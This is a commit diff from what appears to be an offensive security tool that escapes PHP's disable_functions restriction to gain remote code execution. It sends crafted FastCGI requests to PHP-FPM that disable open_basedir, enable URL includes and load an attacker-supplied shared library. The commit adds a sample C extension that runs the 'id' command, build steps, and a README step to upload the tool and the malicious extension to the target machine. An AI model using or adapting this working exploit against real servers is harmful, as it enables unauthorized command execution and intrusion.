update

w181496 · Apr 12, 2019 · 02592ff · 02592ff
1 parent a85f41d
commit 02592ff
Show file tree

Hide file tree

Showing 7 changed files with 60 additions and 3 deletions.
diff --git a/README.md b/README.md
@@ -15,6 +15,6 @@ It will help you to bypass strict `disable_functions` to RCE by loading the mali
     - extension name
     - prepend file
     - ...
-- upload this script and your malicious extension
+- upload this script and your malicious extension to the target machine
 - enjoy it!
 
diff --git a/ext_example/hello/README.md b/ext_example/hello/README.md
@@ -0,0 +1,18 @@
+# hello module
+
+this module will run `id` command by calling `hello_world()` function.
+
+Caution: different php api version may cause module loading error.
+
+## how to build
+
+- phpize
+- ./configure
+- make
+
+## example
+
+- `/build/hello.so`
+    - php 7.2
+    - x64 elf
+    - PHP Api Version: 20170718
diff --git a/ext_example/hello/build/hello.so b/ext_example/hello/build/hello.so
diff --git a/ext_example/hello/config.m4 b/ext_example/hello/config.m4
@@ -0,0 +1,7 @@
+dnl Tell PHP about the argument to enable the hello extension
+
+PHP_ARG_ENABLE(hello, Whether to enable the hello world extension, [ --enable-hello   Enable hello world])
+
+if test "$PHP_HELLO" != "no"; then
+    PHP_NEW_EXTENSION(hello, src/hello.c, $ext_shared)
+fi
diff --git a/ext_example/hello/src/hello.c b/ext_example/hello/src/hello.c
@@ -0,0 +1,28 @@
+#include <php.h>
+#include "hello.h"
+
+zend_function_entry hello_functions[] = {
+            PHP_FE(hello_world, NULL)
+        PHP_FE_END
+};
+
+zend_module_entry hello_module_entry = {
+            STANDARD_MODULE_HEADER,
+        PHP_HELLO_EXTNAME,
+        hello_functions,
+        NULL,
+        NULL,
+        NULL,
+        NULL,
+        NULL,
+        PHP_HELLO_VERSION,
+        STANDARD_MODULE_PROPERTIES,
+};
+
+ZEND_GET_MODULE(hello);
+
+PHP_FUNCTION(hello_world) {
+        int ret, mode = 1;
+        char *cmd = "id";
+        ret = php_exec(mode, cmd, NULL, return_value);
+};
diff --git a/ext_example/hello/src/hello.h b/ext_example/hello/src/hello.h
@@ -0,0 +1,4 @@
+#define PHP_HELLO_EXTNAME "hello"
+#define PHP_HELLO_VERSION "0.0.1"
+
+PHP_FUNCTION(hello_world);
diff --git a/index.php b/index.php
@@ -265,7 +265,7 @@ public function request(array $params, $stdin)
 $ext_name = 'hello.so';
 
 // unix socket path or tcp host
-$connect_path = '/var/run/php/php7.2-fpm.sock';
+$connect_path = 'unix:///var/run/php/php7.2-fpm.sock';
 
 // tcp connection port (unix socket: -1)
 $port = -1;
@@ -280,7 +280,7 @@ public function request(array $params, $stdin)
 
 $req = '/' . basename($filepath);
 $uri = $req;
-$client = new FCGIClient("unix://" . $connect_path, $port);
+$client = new FCGIClient($connect_path, $port);
 
 // disable open_basedir and open allow_url_include
 $php_value = "allow_url_include = On\nopen_basedir = /\nauto_prepend_file = " . $prepend_file_path;